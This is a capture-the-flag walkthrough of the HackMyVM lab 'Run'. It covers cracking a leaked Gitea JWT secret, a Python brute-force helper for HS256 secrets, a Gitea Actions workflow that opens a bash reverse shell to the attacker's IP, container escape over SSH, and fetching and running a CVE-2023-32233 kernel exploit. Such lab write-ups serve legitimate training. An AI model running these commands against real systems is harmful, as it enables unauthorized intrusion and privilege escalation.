[HackMyVM] Target: Run

2024/11/18 21:31:59

kali: 192.168.56.104

Host discovery

arp-scan -l
# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:d2:e0:49, IPv4: 192.168.56.104
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    0a:00:27:00:00:05       (Unknown: locally administered)
192.168.56.100  08:00:27:bb:bb:02       PCS Systemtechnik GmbH
192.168.56.114  08:00:27:a6:14:7c       PCS Systemtechnik GmbH

Target: 192.168.56.114

Port scan

nmap 192.168.56.114
PORT     STATE SERVICE
3000/tcp open  ppp

Only port 3000 is open.

Opening it in a browser shows a Gitea instance.

Browsing it, there is a flask jwt auth repository.

The jwt_token is not visible in the current code.

It can, however, be seen in the file's commit history:

jwt_token = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTcwNzE0ODY1OCwianRpIjoiNjAwMWI5N2YtZjllOC00YTIxLThlYWMtYmE5NWEwY2Y4MDQ4IiwidHlwZSI6ImFjY2VzcyIsInN1YiI6ImRldiIsIm5iZiI6MTcwNzE0ODY1OCwiY3NyZiI6ImFkZjdmOTBiLWQ2NDctNDljZS1hNGRhLTQ3NDI1OWZkYzcyYyIsImV4cCI6MTcwNzE0OTI1OCwidXNlcm5hbWUiOiJkZXYifQ.tRZPFKRfJV7T-EHyQiBFqDEE1hl83MyCGtaBpSMwU_o"

Decoding the token by itself yields nothing useful.

Crack the JWT signing secret with a dictionary attack (hashcat mode 16500, JWT, against rockyou):

# hashcat -O -a 0 -m 16500 jwtt.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 5.0+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 16.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: cpu-haswell-12th Gen Intel(R) Core(TM) i7-12700H, 1906/3876 MB (512 MB allocatable), 1MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 0 MB

Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 3 secs

Cracking performance lower than expected?                 

* Append -w 3 to the commandline.
  This can cause your screen to lag.

* Append -S to the commandline.
  This has a drastic speed impact but can be better for specific attacks.
  Typical scenarios are a small wordlist but a large ruleset.

* Update your backend API runtime / driver the right way:
  https://hashcat.net/faq/wrongdriver

* Create more work items to make use of your parallelization power:
  https://hashcat.net/faq/morework

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTcwNzE0ODY1OCwianRpIjoiNjAwMWI5N2YtZjllOC00YTIxLThlYWMtYmE5NWEwY2Y4MDQ4IiwidHlwZSI6ImFjY2VzcyIsInN1YiI6ImRldiIsIm5iZiI6MTcwNzE0ODY1OCwiY3NyZiI6ImFkZjdmOTBiLWQ2NDctNDljZS1hNGRhLTQ3NDI1OWZkYzcyYyIsImV4cCI6MTcwNzE0OTI1OCwidXNlcm5hbWUiOiJkZXYifQ.tRZPFKRfJV7T-EHyQiBFqDEE1hl83MyCGtaBpSMwU_o:developer88

The secret is developer88.

Decoding the token payload gives the username dev.
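As an added example (not from the write-up), the check hashcat performs above done by hand in Python: decode the leaked token's claims without trusting them, then test candidate secrets by recomputing the HS256 signature over header.payload. The token is the one recovered from the repository history; the five-entry word list is constructed and stands in for rockyou.txt.

```python
import base64
import hashlib
import hmac
import json

# Token as recovered from the repository history in the write-up.
TOKEN = (
    "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
    "eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTcwNzE0ODY1OCwianRpIjoiNjAwMWI5N2YtZjllOC00YTIxLThlYWMtYmE5NWEwY2Y4MDQ4IiwidHlwZSI6ImFjY2VzcyIsInN1YiI6ImRldiIsIm5iZiI6MTcwNzE0ODY1OCwiY3NyZiI6ImFkZjdmOTBiLWQ2NDctNDljZS1hNGRhLTQ3NDI1OWZkYzcyYyIsImV4cCI6MTcwNzE0OTI1OCwidXNlcm5hbWUiOiJkZXYifQ."
    "tRZPFKRfJV7T-EHyQiBFqDEE1hl83MyCGtaBpSMwU_o"
)

# Constructed mini word list standing in for rockyou.txt.
WORDLIST = ["password", "123456", "developer", "dev", "developer88"]


def _b64url_decode(part: str) -> bytes:
    # JWT strips base64 padding; restore it before decoding.
    return base64.urlsafe_b64decode(part + "=" * (-len(part) % 4))


def decode_claims(token: str):
    """Return (header, payload) dicts without verifying anything."""
    header, payload, _signature = token.split(".")
    return json.loads(_b64url_decode(header)), json.loads(_b64url_decode(payload))


def verify_hs256(token: str, secret: str) -> bool:
    """Recompute HMAC-SHA256 over 'header.payload' and compare to the signature."""
    header, payload, signature = token.split(".")
    if decode_claims(token)[0].get("alg") != "HS256":
        return False  # only HS256 is handled here; alg=none is never accepted
    mac = hmac.new(secret.encode(), f"{header}.{payload}".encode(), hashlib.sha256).digest()
    expected = base64.urlsafe_b64encode(mac).rstrip(b"=").decode()
    return hmac.compare_digest(expected, signature)


def find_weak_secret(token: str, candidates):
    """Dictionary check: the same work hashcat -m 16500 does, for a short list.

    The leaked token itself had already expired ('exp' claim), but anyone who
    learns the secret can mint fresh tokens for any 'sub', which is the real damage.
    """
    for candidate in candidates:
        if verify_hs256(token, candidate):
            return candidate
    return None


if __name__ == "__main__":
    header, claims = decode_claims(TOKEN)
    print(header, claims["sub"], claims["exp"])
    print("weak secret:", find_weak_secret(TOKEN, WORDLIST))
```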

Log in to Gitea with dev/developer88.

Create a new repository.

Then enable Actions in the repository settings.

Create the .gitea/workflows directory and write a workflow YAML file containing a reverse shell:

# mkdir -p .gitea/workflows

┌──(root㉿kali2)-[~/Desktop]
└─# cd .gitea/workflows

┌──(root㉿kali2)-[~/Desktop/.gitea/workflows]
└─# vim shell.yaml

┌──(root㉿kali2)-[~/Desktop/.gitea/workflows]
└─# cat shell.yaml
name: demo
run-name: ${{ github.actor }} is testing out Gitea Action
on: [push]
jobs:
  Explore-Gitea-Actions:
    runs-on: run
    steps:
      - run: /bin/bash -i >& /dev/tcp/192.168.56.104/4567 0>&1

┌──(root㉿kali2)-[~/Desktop/.gitea/workflows]
└─# mv ~/Desktop/.gitea ~/Desktop/myshell

Running Actions requires a runner, so download one:

Gitea | act_runner

Now a runner has to be registered:

./act_runner register --no-interactive --instance <instance> --token <token>

The instance is the Gitea address (the target IP and port).

The token comes from the "add runner" section of the Actions settings.

# ./act_runner register --no-interactive --instance http://192.168.56.114:3000 --token ralq3rc5Kw1V20XmovyTG0DKBMc6gQuZybTHMYHC

INFO Registering runner, arch=amd64, os=linux, version=v0.2.6. 
INFO Runner name is empty, use hostname 'kali2'.  
DEBU Successfully pinged the Gitea instance server 
INFO Runner registered successfully. 

Then start the runner:

./act_runner daemon                                                                                                          
INFO[2024-03-07T22:44:44+08:00] Starting runner daemon                       
INFO[2024-03-07T22:44:44+08:00] runner: kali2, with version: v0.2.6, with labels: [ubuntu-latest ubuntu-22.04 ubuntu-20.04 ubuntu-18.04], declare successfully 

Then push shell.yaml to the repository:

┌──(root㉿kali2)-[~/Desktop/myshell/.gitea/workflows]
└─# git config user.email "dev@run.hmv"

┌──(root㉿kali2)-[~/Desktop/myshell/.gitea/workflows]
└─# git config user.name "dev"

┌──(root㉿kali2)-[~/Desktop/myshell/.gitea/workflows]
└─# git add .

┌──(root㉿kali2)-[~/Desktop/myshell/.gitea/workflows]
└─# git commit -m "Testing"
[main (root-commit) 2708ed7] Testing
 1 file changed, 8 insertions(+)
 create mode 100644 .gitea/workflows/shell.yaml

┌──(root㉿kali2)-[~/Desktop/myshell/.gitea/workflows]
└─# git push origin main
Username for 'http://192.168.56.114:3000': dev
Password for 'http://dev@192.168.56.114:3000': 
Enumerating objects: 5, done.
Counting objects: 100% (5/5), done.
Compressing objects: 100% (2/2), done.
Writing objects: 100% (5/5), 446 bytes | 446.00 KiB/s, done.
Total 5 (delta 0), reused 0 (delta 0), pack-reused 0
remote: . Processing 1 references
remote: Processed 1 references in total
To http://192.168.56.114:3000/dev/myshell.git
 * [new branch]      main -> main

The listener opened earlier receives a shell.

It is still inside a Docker container, though:

act@41571465a87b:~/cache/actions/e62fd81b2b2325de/hostexecutor$ ip route show
ip route show
default via 172.18.0.1 dev eth0 
172.18.0.0/16 dev eth0 proto kernel scope link src 172.18.0.4 

First get a stable shell:

act@41571465a87b:~/cache/actions/9246c6b12576b1d1/hostexecutor$ sudo su -
sudo su -
script /dev/null -c bash
Script started, output log file is '/dev/null'.
root@41571465a87b:~# ^Z
zsh: suspended  nc -lvnp 4567

┌──(root㉿kali2)-[~/Desktop]
└─# stty raw -echo;fg
[2]  - continued  nc -lvnp 4567
                               reset
reset: unknown terminal type unknown
Terminal type? xterm

Then get out of Docker.

Check the IP:

ip route show
# default via 172.18.0.1 dev eth0 
# 172.18.0.0/16 dev eth0 proto kernel scope link src 172.18.0.4 

SSH to the Docker host (the default gateway):

root@41571465a87b:~# ssh dev@172.18.0.1
The authenticity of host '172.18.0.1 (172.18.0.1)' can't be established.
ED25519 key fingerprint is SHA256:IGhXsYmgq4sTpoMPHq+MgSiAiNHWOR4ZkocqlvZPGis.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '172.18.0.1' (ED25519) to the list of known hosts.
dev@172.18.0.1's password: 


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

Last login: Tue Feb  6 15:52:41 2024 from 172.18.0.4
dev@run:~$ ls -al
total 32
drwxr-x--- 4 dev  dev  4096 Mar  7 15:16 .
drwxr-xr-x 3 root root 4096 Feb  5 13:10 ..
lrwxrwxrwx 1 root root    9 Feb  5 13:40 .bash_history -> /dev/null
-rw-r--r-- 1 dev  dev   220 Jan  7  2023 .bash_logout
-rw-r--r-- 1 dev  dev  3771 Jan  7  2023 .bashrc
drwx------ 2 dev  dev  4096 Mar  7 15:16 .cache
-rw-r--r-- 1 dev  dev   807 Jan  7  2023 .profile
drwx------ 2 dev  dev  4096 Feb  5 13:10 .ssh
-rw------- 1 dev  dev    33 Feb  6 16:01 user.txt
dev@run:~$ cat user.txt
56f98bdfaf5186243bc4cb99f0674f58

User flag obtained.

Check the Linux kernel:

dev@run:~$ uname -a
Linux run 6.2.0-20-generic #20-Ubuntu SMP PREEMPT_DYNAMIC Thu Apr  6 07:48:48 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux

Searching for 6.2.0-20-generic turns up a CVE:

Linux Kernel privilege escalation vulnerability (CVE-2023-32233) - Alibaba Cloud Developer Community (aliyun.com)

openwall.com/lists/oss-security/2023/05/15/5/3

apt install gcc libmnl-dev libnftnl-dev

gcc -Wall -o exploit exp.c -lmnl -lnftnl

dev@run:~$ wget http://192.168.56.104:6677/exploit
--2024-03-07 15:24:06--  http://192.168.56.104:6677/exploit
Connecting to 192.168.56.104:6677... connected.
HTTP request sent, awaiting response... 200 OK
Length: 63456 (62K) [application/octet-stream]
Saving to: ‘exploit’

exploit             100%[===================>]  61.97K  --.-KB/s    in 0.003s  

2024-03-07 15:24:06 (24.2 MB/s) - ‘exploit’ saved [63456/63456]

dev@run:~$ ls -al
total 96
drwxr-x--- 4 dev  dev   4096 Mar  7 15:24 .
drwxr-xr-x 3 root root  4096 Feb  5 13:10 ..
lrwxrwxrwx 1 root root     9 Feb  5 13:40 .bash_history -> /dev/null
-rw-r--r-- 1 dev  dev    220 Jan  7  2023 .bash_logout
-rw-r--r-- 1 dev  dev   3771 Jan  7  2023 .bashrc
drwx------ 2 dev  dev   4096 Mar  7 15:16 .cache
-rw-rw-r-- 1 dev  dev  63456 Mar  7 15:22 exploit
-rw-r--r-- 1 dev  dev    807 Jan  7  2023 .profile
drwx------ 2 dev  dev   4096 Feb  5 13:10 .ssh
-rw------- 1 dev  dev     33 Feb  6 16:01 user.txt
dev@run:~$ chmod +x exploit
dev@run:~$ ./exploit
[*] Netfilter UAF exploit


Using profile:
========
1                   race_set_slab                   # {0,1}
1572                race_set_elem_count             # k
4000                initial_sleep                   # ms
100                 race_lead_sleep                 # ms
600                 race_lag_sleep                  # ms
100                 reuse_sleep                     # ms
39d240              free_percpu                     # hex
2a8b900             modprobe_path                   # hex
23700               nft_counter_destroy             # hex
347a0               nft_counter_ops                 # hex
a                   nft_counter_destroy_call_offset # hex
ffffffff            nft_counter_destroy_call_mask   # hex
e8e58948            nft_counter_destroy_call_check  # hex
========

[*] Checking for available CPUs...
[*] sched_getaffinity() => 0 2
[*] Reserved CPU 0 for PWN Worker
[*] Creating "/tmp/modprobe"...
[*] Creating "/tmp/trigger"...
[*] Updating setgroups...
[*] Updating uid_map...
[*] Updating gid_map...
[*] Signaling PWN Worker...
[*] Waiting for PWN Worker...
[*] Starting PWN Worker
[*] Putting on seatbelts
pwn_prepare
pwn_uaf_spray
pwn_delay_spray_set
pwn_uaf_trigger
pwn_uaf_race
pwn_uaf_new_obj
pwn_uaf_dump_rule
[*] Signaling status=11 to coordinator...
[*] Got status=11 from PWN Worker...
[*] Creating "/tmp/modprobe"...
[*] Creating "/tmp/trigger"...
[*] Updating setgroups...
[*] Updating uid_map...
[*] Updating gid_map...
[*] Signaling PWN Worker...
[*] Waiting for PWN Worker...
[*] Starting PWN Worker
[*] Putting on seatbelts
pwn_prepare
pwn_uaf_spray
pwn_delay_spray_set
pwn_uaf_trigger
pwn_uaf_race
pwn_uaf_new_obj
pwn_uaf_dump_rule
[*] Signaling status=11 to coordinator...
[*] Got status=11 from PWN Worker...
[*] Creating "/tmp/modprobe"...
[*] Creating "/tmp/trigger"...
[*] Updating setgroups...
[*] Updating uid_map...
[*] Updating gid_map...
[*] Signaling PWN Worker...
[*] Waiting for PWN Worker...
[*] Starting PWN Worker
[*] Putting on seatbelts
pwn_prepare
pwn_uaf_spray
pwn_delay_spray_set
pwn_uaf_trigger
pwn_uaf_race
pwn_uaf_new_obj
pwn_uaf_dump_rule
[*] Signaling status=11 to coordinator...
[*] Got status=11 from PWN Worker...
[*] Creating "/tmp/modprobe"...
[*] Creating "/tmp/trigger"...
[*] Updating setgroups...
[*] Updating uid_map...
[*] Updating gid_map...
[*] Signaling PWN Worker...
[*] Waiting for PWN Worker...
[*] Starting PWN Worker
[*] Putting on seatbelts
pwn_prepare
pwn_uaf_spray
pwn_delay_spray_set
pwn_uaf_trigger
pwn_uaf_race
pwn_uaf_new_obj
pwn_uaf_dump_rule
[*] Signaling status=11 to coordinator...
[*] Got status=11 from PWN Worker...
[*] Creating "/tmp/modprobe"...
[*] Creating "/tmp/trigger"...
[*] Updating setgroups...
[*] Updating uid_map...
[*] Updating gid_map...
[*] Signaling PWN Worker...
[*] Waiting for PWN Worker...
[*] Starting PWN Worker
[*] Putting on seatbelts
pwn_prepare
pwn_uaf_spray
pwn_delay_spray_set
pwn_uaf_trigger
pwn_uaf_race
pwn_uaf_new_obj
pwn_uaf_dump_rule
[*] Signaling status=11 to coordinator...
[*] Got status=11 from PWN Worker...


[*] No ROOT for you:-(
[*] Please reboot the machine!

Reboot the machine and run it again; then it works.
